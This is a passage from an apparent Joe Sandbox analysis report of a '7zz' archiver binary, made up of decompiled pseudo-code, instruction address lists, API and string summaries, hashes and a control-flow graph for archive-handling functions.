																			 *(_t791 - 4) = 0;
																			if(_t786 != 0) {
																				 *((intOrPtr*)( *_t786 + 8))(_t786);
																			}
																			_t790 =  *(_t791 - 0x1c);
																			goto L110;
																		} else {
																			goto L67;
																		}
																	}
																	goto L116;
																	L67:
																	_t539 =  *(_t791 - 0xcc);
																	 *(_t791 + 0x24) =  *(_t791 + 0x24) + 1;
																	__eflags =  *(_t791 + 0x24) - _t539;
																} while ( *(_t791 + 0x24) < _t539);
																goto L68;
															}
														} else {
															_t573 =  *((intOrPtr*)( *( *(_t791 + 0x1c)) + 0x34))(_t791 - 0x30);
															__eflags = _t573;
															 *(_t791 + 0x24) = _t573;
															if(_t573 != 0) {
																E00407A18( *((intOrPtr*)(_t791 - 0x30)));
																 *(_t791 - 4) = 5;
																E00408604(_t791 - 0x48);
																 *(_t791 - 4) = 4;
																E00403411(_t791 - 0xd4);
																E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																__eflags = _t786;
																 *(_t791 - 4) = 0;
																if(_t786 != 0) {
																	 *((intOrPtr*)( *_t786 + 8))(_t786);
																}
																_t790 =  *(_t791 + 0x24);
																goto L110;
															} else {
																goto L64;
															}
														}
													}
												} else {
													 *(_t791 - 0x18) =  *(_t791 - 0x18) +  *((intOrPtr*)(_t791 - 0xac));
													_t581 =  *(_t791 + 0x1c);
													asm("adc [ebp-0x14], ecx");
													_t582 =  *((intOrPtr*)( *_t581 + 0xc))(_t581,  *(_t791 - 0x18),  *(_t791 - 0x14));
													__eflags = _t582;
													 *(_t791 + 0x24) = _t582;
													if(_t582 != 0) {
														 *(_t791 - 4) = 5;
														E00408604(_t791 - 0x48);
														 *(_t791 - 4) = 4;
														E00403411(_t791 - 0xd4);
														E00407A18( *((intOrPtr*)(_t791 - 0x70)));
														__eflags = _t786;
														 *(_t791 - 4) = 0;
														if(_t786 != 0) {
															 *((intOrPtr*)( *_t786 + 8))(_t786);
														}
														_t790 =  *(_t791 + 0x24);
														L110:
														 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
														E00408604(_t791 - 0xe8);
														_t468 = _t790;
														goto L82;
													} else {
														goto L61;
													}
												}
											}
										}
									}
								}
							}
							goto L116;
							L78:
							 *(_t791 - 4) = 5;
							E00408604(_t791 - 0x48);
							 *(_t791 - 4) = 4;
							E00403411(_t791 - 0xd4);
							 *(_t791 - 4) = 3;
							E00407A18( *((intOrPtr*)(_t791 - 0x70)));
							 *(_t791 - 0x20) =  *(_t791 - 0x20) + 1;
							__eflags =  *(_t791 - 0x20) -  *(_t791 - 0x24);
						} while ( *(_t791 - 0x20) <  *(_t791 - 0x24));
						goto L79;
					}
				} else {
					_t631 =  *(_t791 + 0x1c);
					_t632 =  *((intOrPtr*)( *_t631 + 0xc))(_t631,  *(_t791 - 0x18),  *(_t791 - 0x14));
					 *(_t791 + 0x24) = _t632;
					if(_t632 == 0) {
						goto L20;
					} else {
						 *(_t791 - 4) = 0;
						if(_t786 != 0) {
							 *((intOrPtr*)( *_t786 + 8))(_t786);
						}
						 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
						E00408604(_t791 - 0xe8);
						_t468 =  *(_t791 + 0x24);
						L82:
						 *[fs:0x0] =  *((intOrPtr*)(_t791 - 0xc));
						return _t468;
					}
				}
				L116:
			}



























































                                                                      0x00415d31
                                                                      0x00415d36
                                                                      0x00415d44
                                                                      0x00415d47
                                                                      0x00415d4c
                                                                      0x00415d4f
                                                                      0x00415d52
                                                                      0x00415d55
                                                                      0x00415d58
                                                                      0x00415d5b
                                                                      0x00415d65
                                                                      0x00415d68
                                                                      0x00415d6b
                                                                      0x00415d6e
                                                                      0x00415d71
                                                                      0x00415d74
                                                                      0x00415d77
                                                                      0x00415d7a
                                                                      0x00415d7d
                                                                      0x00415d82
                                                                      0x00415d8f
                                                                      0x00415d94
                                                                      0x00415d9e
                                                                      0x00415d96
                                                                      0x00415d98
                                                                      0x00415d98
                                                                      0x00415da1
                                                                      0x00415da5
                                                                      0x00415da8
                                                                      0x00415e28
                                                                      0x00415e28
                                                                      0x00415e2d
                                                                      0x00415e33
                                                                      0x00415e35
                                                                      0x00415e3a
                                                                      0x00415e3e
                                                                      0x00000000
                                                                      0x00415e40
                                                                      0x00415e40
                                                                      0x00415e45
                                                                      0x00415e45
                                                                      0x00415daa
                                                                      0x00415daa
                                                                      0x00415dad
                                                                      0x00415db5
                                                                      0x00415db9
                                                                      0x00415dbf
                                                                      0x00415dc5
                                                                      0x00415dc7
                                                                      0x00000000
                                                                      0x00415dc9
                                                                      0x00415dd8
                                                                      0x00415de1
                                                                      0x00415e52
                                                                      0x00415e59
                                                                      0x00415e5e
                                                                      0x00415e67
                                                                      0x00415e6e
                                                                      0x00415e73
                                                                      0x00415e73
                                                                      0x00415e73
                                                                      0x00415de3
                                                                      0x00415deb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415deb
                                                                      0x00415de1
                                                                      0x00000000
                                                                      0x00415ded
                                                                      0x00415dff
                                                                      0x00415e10
                                                                      0x00415e16
                                                                      0x00415e19
                                                                      0x00415e1c
                                                                      0x00415e21
                                                                      0x00415e23
                                                                      0x00000000
                                                                      0x00415daa
                                                                      0x00415e75
                                                                      0x00415e77
                                                                      0x00415e7a
                                                                      0x00415e80
                                                                      0x00415e85
                                                                      0x00415e85
                                                                      0x00415e8c
                                                                      0x00415e8f
                                                                      0x00415e99
                                                                      0x00415e9c
                                                                      0x00415ea2
                                                                      0x00415ea8
                                                                      0x00415eb0
                                                                      0x00415eb6
                                                                      0x00415eb9
                                                                      0x00415ebc
                                                                      0x00415ec2
                                                                      0x00415ec8
                                                                      0x00415ece
                                                                      0x00415ed4
                                                                      0x00415f10
                                                                      0x00415f10
                                                                      0x00415f13
                                                                      0x00415f16
                                                                      0x004163df
                                                                      0x004163e5
                                                                      0x004163e7
                                                                      0x004163f0
                                                                      0x004163f9
                                                                      0x00416402
                                                                      0x0041640b
                                                                      0x00416414
                                                                      0x0041641d
                                                                      0x00416423
                                                                      0x00416429
                                                                      0x0041642a
                                                                      0x0041642c
                                                                      0x0041642f
                                                                      0x00416438
                                                                      0x0041643e
                                                                      0x00416441
                                                                      0x00416446
                                                                      0x00416446
                                                                      0x00416449
                                                                      0x00416453
                                                                      0x00416458
                                                                      0x00416458
                                                                      0x00000000
                                                                      0x00415f1c
                                                                      0x00415f1c
                                                                      0x00415f2b
                                                                      0x00415f2e
                                                                      0x00415f36
                                                                      0x00415f3a
                                                                      0x00415f3c
                                                                      0x00415f52
                                                                      0x00415f58
                                                                      0x00415f5a
                                                                      0x00415f5f
                                                                      0x00415f61
                                                                      0x0041668a
                                                                      0x00416693
                                                                      0x0041669a
                                                                      0x004166a4
                                                                      0x004166a9
                                                                      0x004166aa
                                                                      0x004166ab
                                                                      0x004166ac
                                                                      0x004166ad
                                                                      0x004166b1
                                                                      0x004166b2
                                                                      0x004166b5
                                                                      0x004166bb
                                                                      0x004166c2
                                                                      0x004166c9
                                                                      0x004166cc
                                                                      0x004166cf
                                                                      0x004166d2
                                                                      0x004166d5
                                                                      0x004166d8
                                                                      0x004166dd
                                                                      0x004166e1
                                                                      0x004166e3
                                                                      0x004166e6
                                                                      0x004166e9
                                                                      0x004166ee
                                                                      0x004166f3
                                                                      0x004166f7
                                                                      0x004166f9
                                                                      0x004166fc
                                                                      0x004166ff
                                                                      0x00416704
                                                                      0x00416709
                                                                      0x0041670d
                                                                      0x0041670f
                                                                      0x00416712
                                                                      0x00416715
                                                                      0x0041671a
                                                                      0x0041671e
                                                                      0x00416722
                                                                      0x00416726
                                                                      0x0041672c
                                                                      0x00416732
                                                                      0x00416738
                                                                      0x0041673b
                                                                      0x0041673e
                                                                      0x00416741
                                                                      0x00416748
                                                                      0x0041674e
                                                                      0x00416754
                                                                      0x0041675a
                                                                      0x0041675c
                                                                      0x0041675e
                                                                      0x00416762
                                                                      0x00416768
                                                                      0x0041676f
                                                                      0x00416776
                                                                      0x0041677c
                                                                      0x0041677f
                                                                      0x00416781
                                                                      0x00416785
                                                                      0x00416790
                                                                      0x00416790
                                                                      0x00416787
                                                                      0x00416789
                                                                      0x00416789
                                                                      0x00416795
                                                                      0x00416799
                                                                      0x0041679f
                                                                      0x004167ac
                                                                      0x004167b4
                                                                      0x00415f67
                                                                      0x00415f6a
                                                                      0x00415f6d
                                                                      0x00415f6f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415f6f
                                                                      0x00415f3e
                                                                      0x00415f3e
                                                                      0x00415f44
                                                                      0x00415f4a
                                                                      0x00415f75
                                                                      0x00415f7a
                                                                      0x00415f88
                                                                      0x00415f8b
                                                                      0x00415f8d
                                                                      0x00415f90
                                                                      0x0041646e
                                                                      0x00416473
                                                                      0x00416476
                                                                      0x00416479
                                                                      0x0041647e
                                                                      0x0041647e
                                                                      0x00416481
                                                                      0x00000000
                                                                      0x00415f96
                                                                      0x00415f9c
                                                                      0x00415fa6
                                                                      0x00415faa
                                                                      0x00415fb2
                                                                      0x00415fb6
                                                                      0x00415fbd
                                                                      0x00415fc5
                                                                      0x00415fc8
                                                                      0x00415fcd
                                                                      0x00415fd0
                                                                      0x00415fd4
                                                                      0x00415fd7
                                                                      0x00415fdd
                                                                      0x00415fe0
                                                                      0x00415fe3
                                                                      0x00415fe5
                                                                      0x00415feb
                                                                      0x00415fed
                                                                      0x00415ff1
                                                                      0x00415ff1
                                                                      0x00415ff5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415ff7
                                                                      0x00415ff9
                                                                      0x00416008
                                                                      0x00416008
                                                                      0x00416008
                                                                      0x00415ffb
                                                                      0x00415ffc
                                                                      0x00000000
                                                                      0x00415ffc
                                                                      0x0041600c
                                                                      0x0041600c
                                                                      0x0041600f
                                                                      0x00416021
                                                                      0x0041602d
                                                                      0x00416031
                                                                      0x00416036
                                                                      0x00416038
                                                                      0x0041603b
                                                                      0x00416049
                                                                      0x0041604e
                                                                      0x00416050
                                                                      0x00416063
                                                                      0x0041606c
                                                                      0x00416070
                                                                      0x00416075
                                                                      0x0041607f
                                                                      0x00416084
                                                                      0x00416088
                                                                      0x0041608a
                                                                      0x0041608c
                                                                      0x0041608f
                                                                      0x00416093
                                                                      0x00416093
                                                                      0x00416097
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00416099
                                                                      0x0041609b
                                                                      0x004160a7
                                                                      0x004160a7
                                                                      0x0041609d
                                                                      0x0041609e
                                                                      0x00000000
                                                                      0x0041609e
                                                                      0x004160aa
                                                                      0x004160aa
                                                                      0x004160ac
                                                                      0x004160ba
                                                                      0x004160c3
                                                                      0x004160cc
                                                                      0x004160cf
                                                                      0x004160d9
                                                                      0x004160de
                                                                      0x004160e2
                                                                      0x004160ec
                                                                      0x004160f1
                                                                      0x004160f3
                                                                      0x004160fb
                                                                      0x00416106
                                                                      0x00416106
                                                                      0x004160f3
                                                                      0x004160e2
                                                                      0x00000000
                                                                      0x004160ac
                                                                      0x004160a3
                                                                      0x00000000
                                                                      0x004160a3
                                                                      0x0041608a
                                                                      0x00416050
                                                                      0x0041610b
                                                                      0x0041610e
                                                                      0x00416112
                                                                      0x00416117
                                                                      0x00000000
                                                                      0x0041600f
                                                                      0x00416003
                                                                      0x00000000
                                                                      0x00416003
                                                                      0x00415fe5
                                                                      0x00416118
                                                                      0x00416118
                                                                      0x00416124
                                                                      0x00416129
                                                                      0x0041612a
                                                                      0x0041612e
                                                                      0x0041612f
                                                                      0x00416132
                                                                      0x00416137
                                                                      0x0041613c
                                                                      0x0041613f
                                                                      0x0041648c
                                                                      0x00416490
                                                                      0x0041649b
                                                                      0x0041649f
                                                                      0x004164a7
                                                                      0x004164ac
                                                                      0x004164af
                                                                      0x004164b2
                                                                      0x004164b7
                                                                      0x004164b7
                                                                      0x004164ba
                                                                      0x00000000
                                                                      0x00416145
                                                                      0x00416150
                                                                      0x0041615f
                                                                      0x00416167
                                                                      0x0041616a
                                                                      0x0041616c
                                                                      0x0041616f
                                                                      0x004164c7
                                                                      0x004164cb
                                                                      0x004164d6
                                                                      0x004164da
                                                                      0x004164e2
                                                                      0x004164e7
                                                                      0x004164ea
                                                                      0x004164ed
                                                                      0x004164f2
                                                                      0x004164f2
                                                                      0x004164f5
                                                                      0x00000000
                                                                      0x00416175
                                                                      0x00416175
                                                                      0x00416178
                                                                      0x00000000
                                                                      0x0041617e
                                                                      0x00416181
                                                                      0x00416183
                                                                      0x00416213
                                                                      0x00416213
                                                                      0x00416189
                                                                      0x00416189
                                                                      0x0041618f
                                                                      0x00416192
                                                                      0x00416198
                                                                      0x004161a7
                                                                      0x004161ac
                                                                      0x004161ae
                                                                      0x004161b1
                                                                      0x004161b6
                                                                      0x004161b9
                                                                      0x004161c5
                                                                      0x004161d2
                                                                      0x004161e3
                                                                      0x004161e3
                                                                      0x004161e3
                                                                      0x004161f4
                                                                      0x004161f7
                                                                      0x00416202
                                                                      0x00416202
                                                                      0x004161b9
                                                                      0x00416205
                                                                      0x0041620b
                                                                      0x0041620b
                                                                      0x00000000
                                                                      0x00416198
                                                                      0x00416192
                                                                      0x00416219
                                                                      0x00416247
                                                                      0x0041624c
                                                                      0x0041624f
                                                                      0x00416252
                                                                      0x00416255
                                                                      0x00416261
                                                                      0x00416267
                                                                      0x0041626a
                                                                      0x0041626c
                                                                      0x0041626f
                                                                      0x00416539
                                                                      0x0041653f
                                                                      0x00416546
                                                                      0x00416551
                                                                      0x00416555
                                                                      0x0041655d
                                                                      0x00416562
                                                                      0x00416565
                                                                      0x00416568
                                                                      0x0041656d
                                                                      0x0041656d
                                                                      0x00416570
                                                                      0x00000000
                                                                      0x00416275
                                                                      0x00416275
                                                                      0x00416278
                                                                      0x00416291
                                                                      0x00416291
                                                                      0x00416297
                                                                      0x0041629a
                                                                      0x0041629c
                                                                      0x004162d5
                                                                      0x004162db
                                                                      0x004162e2
                                                                      0x004162e5
                                                                      0x004162e7
                                                                      0x004162f3
                                                                      0x004162f3
                                                                      0x004162e9
                                                                      0x004162e9
                                                                      0x004162ec
                                                                      0x00000000
                                                                      0x004162ee
                                                                      0x004162ee
                                                                      0x004162f0
                                                                      0x004162f0
                                                                      0x004162ec
                                                                      0x004162f5
                                                                      0x004162fb
                                                                      0x00416301
                                                                      0x00416320
                                                                      0x00416332
                                                                      0x00416337
                                                                      0x00416339
                                                                      0x0041633c
                                                                      0x004165fc
                                                                      0x00416602
                                                                      0x00416609
                                                                      0x00416614
                                                                      0x00416618
                                                                      0x00416620
                                                                      0x00416625
                                                                      0x00416628
                                                                      0x0041662b
                                                                      0x00416630
                                                                      0x00416630
                                                                      0x00416633
                                                                      0x00000000
                                                                      0x00416342
                                                                      0x00416345
                                                                      0x00416347
                                                                      0x00416369
                                                                      0x0041636c
                                                                      0x00416349
                                                                      0x0041634f
                                                                      0x00416355
                                                                      0x0041635b
                                                                      0x00416361
                                                                      0x00416364
                                                                      0x00416364
                                                                      0x00416375
                                                                      0x00416378
                                                                      0x0041637b
                                                                      0x00416387
                                                                      0x00416390
                                                                      0x00416393
                                                                      0x00416396
                                                                      0x00416399
                                                                      0x0041639c
                                                                      0x00416638
                                                                      0x0041663e
                                                                      0x00416645
                                                                      0x00416650
                                                                      0x00416654
                                                                      0x0041665c
                                                                      0x00416661
                                                                      0x00416664
                                                                      0x00416667
                                                                      0x0041666c
                                                                      0x0041666c
                                                                      0x0041666f
                                                                      0x00000000
                                                                      0x004163a2
                                                                      0x004163a2
                                                                      0x00000000
                                                                      0x004163a7
                                                                      0x0041639c
                                                                      0x0041629e
                                                                      0x0041629e
                                                                      0x004162a7
                                                                      0x004162aa
                                                                      0x004162ad
                                                                      0x00000000
                                                                      0x004162af
                                                                      0x004162af
                                                                      0x004162b9
                                                                      0x004162bc
                                                                      0x004162be
                                                                      0x004162c1
                                                                      0x004165bd
                                                                      0x004165c3
                                                                      0x004165ca
                                                                      0x004165d5
                                                                      0x004165d9
                                                                      0x004165e1
                                                                      0x004165e6
                                                                      0x004165e9
                                                                      0x004165ec
                                                                      0x004165f1
                                                                      0x004165f1
                                                                      0x004165f4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004162c1
                                                                      0x00000000
                                                                      0x004162c7
                                                                      0x004162c7
                                                                      0x004162cd
                                                                      0x004162d0
                                                                      0x004162d0
                                                                      0x00000000
                                                                      0x0041629e
                                                                      0x0041627a
                                                                      0x00416283
                                                                      0x00416286
                                                                      0x00416288
                                                                      0x0041628b
                                                                      0x0041657b
                                                                      0x00416581
                                                                      0x00416588
                                                                      0x00416593
                                                                      0x00416597
                                                                      0x0041659f
                                                                      0x004165a4
                                                                      0x004165a7
                                                                      0x004165aa
                                                                      0x004165af
                                                                      0x004165af
                                                                      0x004165b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041628b
                                                                      0x00416278
                                                                      0x0041621b
                                                                      0x00416227
                                                                      0x0041622a
                                                                      0x0041622d
                                                                      0x00416239
                                                                      0x0041623c
                                                                      0x0041623e
                                                                      0x00416241
                                                                      0x00416500
                                                                      0x00416504
                                                                      0x0041650f
                                                                      0x00416513
                                                                      0x0041651b
                                                                      0x00416520
                                                                      0x00416523
                                                                      0x00416526
                                                                      0x0041652b
                                                                      0x0041652b
                                                                      0x0041652e
                                                                      0x00416674
                                                                      0x00416674
                                                                      0x0041667e
                                                                      0x00416683
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00416241
                                                                      0x00416219
                                                                      0x00416178
                                                                      0x0041616f
                                                                      0x0041613f
                                                                      0x00415f90
                                                                      0x00000000
                                                                      0x004163a8
                                                                      0x004163ab
                                                                      0x004163af
                                                                      0x004163ba
                                                                      0x004163be
                                                                      0x004163c3
                                                                      0x004163ca
                                                                      0x004163cf
                                                                      0x004163d6
                                                                      0x004163d6
                                                                      0x00000000
                                                                      0x00415f1c
                                                                      0x00415ed6
                                                                      0x00415ed9
                                                                      0x00415ee2
                                                                      0x00415ee7
                                                                      0x00415eea
                                                                      0x00000000
                                                                      0x00415eec
                                                                      0x00415eee
                                                                      0x00415ef1
                                                                      0x00415ef6
                                                                      0x00415ef6
                                                                      0x00415ef9
                                                                      0x00415f03
                                                                      0x00415f08
                                                                      0x0041645a
                                                                      0x00416460
                                                                      0x00416468
                                                                      0x00416468
                                                                      0x00415eea
                                                                      0x00000000

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00415D36
                                                                        • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                        • Part of subcall function 00403411: __EH_prolog.LIBCMT ref: 00403416
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$ExceptionRaise
                                                                      • String ID: 001$rar
                                                                      • API String ID: 2062786585-402399766
                                                                      • Opcode ID: 6222c04c949ac495ab94f66733b2a8b9047b5a3fd200594ee6b5b932aa16b14e
                                                                      • Instruction ID: 33800bdb08af1194ea128a8acb6c6cdf99de6f84a10513a4969611219b06b6dc
                                                                      • Opcode Fuzzy Hash: 6222c04c949ac495ab94f66733b2a8b9047b5a3fd200594ee6b5b932aa16b14e
                                                                      • Instruction Fuzzy Hash: B5623A70901259DFCB14DFA9C980ADDBBB1BF08308F1545AEE849B7291CB34AE85CF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041035D Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 546COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2449 41035d-410378 call 46b890 2452 41037a call 40fff2 2449->2452 2453 41037f-410391 call 410a4c 2449->2453 2452->2453 2457 410393 call 40fff2 2453->2457 2458 410398-4103c0 call 4071f7 * 3 2453->2458 2457->2458 2466 4103c2-4103d2 call 4071f7 2458->2466 2467 4103d7-4103e3 call 4071f7 2458->2467 2466->2467 2472 4103e5-4103f9 call 4071f7 call 410a39 2467->2472 2473 4103fb 2467->2473 2475 410402-410435 call 41191e * 2 call 4071f7 2472->2475 2473->2475 2485 410437-410454 call 4071f7 call 410ca4 2475->2485 2486 410459-410465 call 4071f7 2475->2486 2485->2486 2492 410485-410494 call 4071f7 2486->2492 2493 410467-410480 call 4071f7 call 410ca4 2486->2493 2499 410496-41049c 2492->2499 2500 4104a9 2492->2500 2493->2492 2499->2500 2501 41049e-4104a1 2499->2501 2502 4104ad-4104ba call 40fe22 2500->2502 2501->2500 2503 4104a3-4104a7 2501->2503 2506 4104c7-4104cf 2502->2506 2507 4104bc-4104c0 2502->2507 2503->2502 2509 4104d1 2506->2509 2510 4104d5-4104d9 2506->2510 2507->2506 2508 4104c2-4104c5 2507->2508 2508->2510 2509->2510 2511 410502-41053a call 410b06 call 4071f7 * 2 2510->2511 2512 4104db-4104df 2510->2512 2526 410552-41056c call 4071f7 * 2 2511->2526 2527 41053c-41054d call 4071f7 call 401e26 2511->2527 2513 4104e1 call 40fff2 2512->2513 2514 4104e6-4104fb call 401e26 2512->2514 2513->2514 2514->2511 2521 4104fd call 40fff2 2514->2521 2521->2511 2535 410587-41058b 2526->2535 2536 41056e-410582 call 4071f7 call 401e26 2526->2536 2527->2526 2538 410591-410598 2535->2538 2539 41075b-410765 call 40fe46 2535->2539 2536->2535 2542 4105a5-4105aa call 40fffd 2538->2542 2543 41059a-4105a3 2538->2543 2549 41076b-410792 call 41124b call 4117bd call 4071f7 2539->2549 2550 4108ae-4108b4 2539->2550 2547 4105af-4105ce call 405b9f call 4071f7 2542->2547 2543->2542 2543->2547 2568 4105d0-4105e8 call 4071f7 call 410ca4 2547->2568 2569 4105ed-4105f9 call 4071f7 2547->2569 2587 410794 2549->2587 2588 41079b-4107b2 call 4071f7 2549->2588 2552 410a16-410a19 2550->2552 2553 4108ba-4108d7 2550->2553 2559 410a20-410a36 call 40925b 2552->2559 2560 410a1b call 40fff2 2552->2560 2556 4108f1-4108ff call 4071f7 2553->2556 2557 4108d9-4108ea call 4119b8 2553->2557 2556->2559 2576 410905-41092f call 4071f7 call 4039c0 call 407ed0 2556->2576 2557->2556 2574 4108ec call 40fff2 2557->2574 2560->2559 2568->2569 2584 410618-41061c 2569->2584 2585 4105fb-410613 call 4071f7 call 410ca4 2569->2585 2574->2556 2609 410931 call 40fff2 2576->2609 2610 410936-410940 2576->2610 2590 41062d-410641 call 411046 call 40925b 2584->2590 2591 41061e-410628 call 410ac9 2584->2591 2585->2584 2587->2588 2601 4107d2-4107e5 call 4071f7 2588->2601 2602 4107b4-4107b9 2588->2602 2618 410643-410682 call 4071f7 call 4039c0 call 406796 * 2 call 407a18 2590->2618 2619 410684-41068e call 41003e 2590->2619 2591->2590 2620 4107e7-410808 call 4071f7 call 401e26 2601->2620 2621 41082c-410844 2601->2621 2605 4107c5-4107c9 2602->2605 2606 4107bb-4107bf 2602->2606 2605->2601 2612 4107cb 2605->2612 2611 4107c1-4107c3 2606->2611 2606->2612 2609->2610 2616 410942-41094a 2610->2616 2617 41097e-410982 2610->2617 2611->2601 2611->2605 2612->2601 2627 41094c-41094e 2616->2627 2628 41094f-41095c call 4119b8 2616->2628 2622 4109b1 call 40fff2 2617->2622 2623 410984-410989 2617->2623 2635 410693-410697 2618->2635 2619->2635 2620->2621 2678 41080a-410814 2620->2678 2624 410884-410886 2621->2624 2625 410846-41084d 2621->2625 2651 4109b6 2622->2651 2631 4109d9-4109dd 2623->2631 2632 41098b-410993 2623->2632 2638 4108a1-4108a9 call 411046 2624->2638 2639 410888-41089c call 4071f7 call 401e26 2624->2639 2633 410864-410866 2625->2633 2634 41084f-41085f call 46b8f4 2625->2634 2627->2628 2659 410963-410967 2628->2659 2660 41095e call 40fff2 2628->2660 2631->2622 2643 4109df-4109e4 2631->2643 2644 410995-410997 2632->2644 2645 410998-4109a0 2632->2645 2633->2624 2647 410868-41086c 2633->2647 2634->2633 2648 410734-410756 call 40862d call 408604 2635->2648 2649 41069d-4106ab call 4117bd 2635->2649 2638->2559 2639->2638 2643->2622 2656 4109e6-4109eb 2643->2656 2644->2645 2663 4109a2-4109af call 4119b8 2645->2663 2664 4109b9-4109d1 call 407a18 call 4071f7 2645->2664 2647->2624 2657 41086e-41087f call 46b8f4 2647->2657 2648->2559 2682 4106ad-4106b1 2649->2682 2683 4106cf-4106db call 4071f7 2649->2683 2651->2664 2656->2664 2668 4109ed-410a14 call 4072c9 call 401e26 call 407a18 2656->2668 2657->2624 2674 410969 call 40fff2 2659->2674 2675 41096e-41097c 2659->2675 2660->2659 2663->2622 2663->2651 2664->2576 2700 4109d7 2664->2700 2668->2651 2674->2675 2675->2651 2678->2621 2679 410816-410827 call 4075a5 2678->2679 2679->2621 2682->2683 2692 4106b3-4106b7 2682->2692 2701 4106fd-41070d call 4071f7 2683->2701 2702 4106dd-4106f8 call 4071f7 call 401e26 call 40beb9 2683->2702 2692->2683 2698 4106b9-4106ca call 46b8f4 2692->2698 2698->2683 2700->2559 2714 410727-41072b 2701->2714 2715 41070f-410725 call 4071f7 2701->2715 2702->2701 2714->2648 2718 41072d 2714->2718 2715->2648 2718->2648
                                                                      C-Code - Quality: 90%
                                                                      			E0041035D(void* __ecx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t192;
				char* _t200;
				intOrPtr _t201;
				intOrPtr _t202;
				signed char _t206;
				char _t212;
				signed char _t216;
				char _t217;
				void* _t218;
				void* _t220;
				intOrPtr* _t225;
				void* _t228;
				void* _t230;
				signed char _t233;
				signed char _t234;
				signed int _t235;
				signed char _t243;
				char* _t247;
				signed int _t248;
				signed int _t249;
				char _t251;
				char* _t252;
				signed char _t253;
				char* _t258;
				signed char _t268;
				char* _t269;
				char* _t291;
				char _t319;
				void* _t331;
				intOrPtr _t357;
				signed int _t363;
				void* _t364;
				signed int _t365;
				char _t375;
				void* _t421;
				void* _t422;
				signed int _t441;
				signed int _t443;
				char* _t444;
				char* _t447;
				void* _t449;

				E0046B890(E00474174, _t449);
				_t331 = __ecx;
				_t192 =  *((intOrPtr*)(__ecx + 0x10));
				_t454 = _t192 - 1;
				 *((intOrPtr*)(_t449 - 0x24)) = _t192;
				if(_t192 < 1) {
					L0040FFF2();
				}
				_t447 =  *(_t449 + 8);
				if(E00410A4C( *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x14)))),  &(_t447[0x20]), _t454) == 0) {
					L0040FFF2();
				}
				_t447[0x40] =  *((intOrPtr*)(E004071F7(_t331, 0x1c)));
				_t447[0x41] =  *((intOrPtr*)(E004071F7(_t331, 0x1f)));
				if( *(E004071F7(_t331, 0x1e)) != 0) {
					 *0x490adc = E004071F7(_t331, 0x1e) & 0xffffff00 |  *((intOrPtr*)(_t326 + 0x18)) < 0x00000000;
				}
				_t200 = E004071F7(_t331, 0x12);
				_t459 =  *_t200;
				if( *_t200 == 0) {
					 *(_t449 - 0x18) = 2;
				} else {
					 *(_t449 - 0x18) = E00410A39( *((intOrPtr*)(E004071F7(_t331, 0x12) + 0x18)));
				}
				_push(0xffffffff);
				_t421 = 0x1b;
				_t201 = E0041191E(_t331, _t421, _t459);
				_push(0xfde9);
				_t422 = 0x1a;
				 *0x48b6f8 = _t201;
				_t202 = E0041191E(_t331, _t422, _t459);
				 *(_t449 - 0x20) =  *(_t449 - 0x20) & 0x00000000;
				 *((intOrPtr*)(_t449 - 0x14)) = _t202;
				if( *((char*)(E004071F7(_t331, 0xb))) != 0) {
					_push( *((intOrPtr*)(_t449 - 0x14)));
					 *(_t449 - 0x20) = 1;
					_push( *(_t449 - 0x18));
					_push(1);
					E00410CA4( &(_t447[0xc]), E004071F7(_t331, 0xb) + 4);
				}
				if( *((char*)(E004071F7(_t331, 0xc))) != 0) {
					_push( *((intOrPtr*)(_t449 - 0x14)));
					_push( *(_t449 - 0x18));
					_push(0);
					E00410CA4( &(_t447[0xc]), E004071F7(_t331, 0xc) + 4);
				}
				_t441 = 1;
				if( *((char*)(E004071F7(_t331, 0xf))) != 0) {
					L17:
					_t26 = _t449 + 0xb;
					 *_t26 =  *(_t449 + 0xb) & 0x00000000;
					__eflags =  *_t26;
					L18:
					_t206 = L0040FE22( &(_t447[0x20]));
					 *(_t449 - 0xe) = _t206;
					if(_t206 != 0 || _t447[0x20] == 6) {
						__eflags = _t447[5];
						 *(_t449 - 0xd) = 1;
						if(_t447[5] != 0) {
